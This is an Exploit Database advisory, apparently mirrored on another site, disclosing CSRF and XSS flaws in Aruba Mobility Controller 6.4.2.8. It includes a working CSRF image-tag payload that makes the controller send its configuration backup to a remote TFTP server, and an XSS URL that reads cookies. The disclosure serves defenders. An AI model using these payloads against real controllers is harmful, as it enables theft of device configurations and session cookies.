Aruba Mobility Controller 6.4.2.8 – Multiple Vulnerabilities

• Exploit Database
• 18 阅读

• 作者： Itzik Chen
  日期： 2015-08-20
• 类别：

  • webapps
  平台：

  • xml
• 来源：https://www.exploit-db.com/exploits/37891/

• # Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
  # Date: 08/016/2015
  # Author: Itzik Chen
  # Product web page: http://www.arubanetworks.com
  # Affected Version: 6.4.2.8
  # Tested on: Aruba7240, Ver 6.2.4.8
  
   
  
  Summary
  ================
  
  Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
  Arube Controller suffers from CSRF and XSS vulnerabilities.
  
  
  
  Proof of Concept - CSRF
  =========================
  
  192.168.0.1 - Controller IP-Address
  172.17.0.1 - Remote TFTP server 
  
  <IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz">
  
  That will send the flashbackup configuration file to a remote TFTP server.
  
  
  
  Proof of Concept - XSS
  =========================
  
  https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>